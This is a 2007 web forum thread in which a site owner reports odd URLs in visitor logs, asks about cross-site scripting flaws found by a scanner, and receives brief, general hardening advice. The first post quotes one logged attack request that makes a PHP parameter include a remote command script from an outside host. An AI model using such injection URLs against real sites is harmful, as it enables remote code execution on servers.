1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Need help about XSS (Cross Site Scripting) issue in my site

Discussion in 'Apache' started by komrad, Aug 15, 2007.

0
  1. #1
    Hello,

    Some days ago, i checked my site visitor statistic and i was really wonder because there was many strange url found.

    Here are some of them:

    http://www.mydomain.com/order.php?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt

    Part of url in bold didnt exist in the site.

    So, could you give me solution about this problem? What should i do?
    Are they dangerous?

    I really need your help. Thanks in advance.
     
    komrad, Aug 15, 2007 IP
  2. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #2
    Also i have checked it with web application security scanner, and indeed there are many part of the site's script vulnerable to xss (cross site scripting) attack.
     
    komrad, Aug 15, 2007 IP
  3. powerspike

    powerspike Peon

    Messages:
    312
    Likes Received:
    10
    Best Answers:
    0
    Trophy Points:
    0
    #3
    you need to see if you can get that fixed asap, it usally indicates that they might be able to get into your server via it - which is obviously a bad thing

    some of the attacks basicly are where you can get an application to open a remote url with code in it, so it'll run on your server (which is obviously a very bad thing)
     
    powerspike, Aug 16, 2007 IP
  4. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #4
    @powerspike
    So, do you have any solutions? or direction where should i find the right answer? Any body?
     
    komrad, Aug 16, 2007 IP
  5. CodyRo

    CodyRo Peon

    Messages:
    365
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    0
    #5
    It's most likely some script kiddie just running queries on any GET on your page.. though it shouldn't be an issue as long as the script is validating any input / REGISTER_GLOBALS is off.
     
    CodyRo, Aug 16, 2007 IP
  6. rootbinbash

    rootbinbash Peon

    Messages:
    2,198
    Likes Received:
    88
    Best Answers:
    0
    Trophy Points:
    0
    #6
    dude, how can you expect a solution without seeing the code or the site?
     
    rootbinbash, Aug 16, 2007 IP
  7. InfiniteTech

    InfiniteTech Active Member

    Messages:
    380
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    70
    #7
    Right.

    We are not hackers here to find that out.
     
    InfiniteTech, Aug 16, 2007 IP
  8. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #8
    I won't let you know which site it is, for security reason.
    But here're some of scanning result using acunetix (web vulnerability scanner) :
    And here's it suggestion about how to fix:
    Do you have any idea what is and how to filter metacharacters from user input?

    Your help would be appreciated.
     
    komrad, Aug 16, 2007 IP
  9. komrad

    komrad Notable Member

    Messages:
    2,534
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    230
    #9
    Hi, i can give you the site script if you want to help me.
     
    komrad, Sep 25, 2007 IP